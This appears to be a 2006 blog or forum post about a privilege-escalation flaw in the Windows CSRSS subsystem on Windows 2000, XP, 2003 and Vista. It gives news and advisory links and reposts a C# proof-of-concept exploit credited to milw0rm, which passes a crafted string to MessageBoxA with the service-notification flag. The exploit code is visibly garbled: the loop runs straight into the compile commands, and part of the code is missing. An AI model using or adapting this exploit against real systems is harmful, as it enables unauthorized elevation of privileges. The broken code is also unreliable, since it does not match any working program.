A flaw discovered in the Windows Client/Server Runtime Server Subsystem (CSRSS) processes that allow privilege escalation attack.
the flaw discovered by a russian dude known as NULL.
vulnerable systems: windows 2000\XP\2003\Vista all fully patched. who said Vista has no code re-use.. :)
links:
http://www.securityfocus.com/brief/393
http://www.informationweek.com/story/showArticle.jhtml?articleID=196701757
http://www.symantec.com/enterprise/security_response/weblog/2006/12/vista_vulnerable.html
http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051394.html
http://www.kuban.ru/forum_new/forum2/files/19124.html

exploit code taken from milw0rm:
// mbox.cs
using System;
using System.Runtime.InteropServices;
class HelloWorldFromMicrosoft
{
[DllImport("user32.dll")]
unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);

static unsafe void Main()
{
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
fixed(byte* pHelloBug = &helloBug[0])
{
for(int i=0; i> csc /unsafe mbox.cs
// >> mbox.exe

// milw0rm.com [2006-12-20]


i wonder if it's the same exploit code hackers were selling - http://www.eweek.com/article2/0,1895,2073611,00.asp ...

https://forum.antichat.ru/thread29837.html

TRUTH? Began.... to be contined -)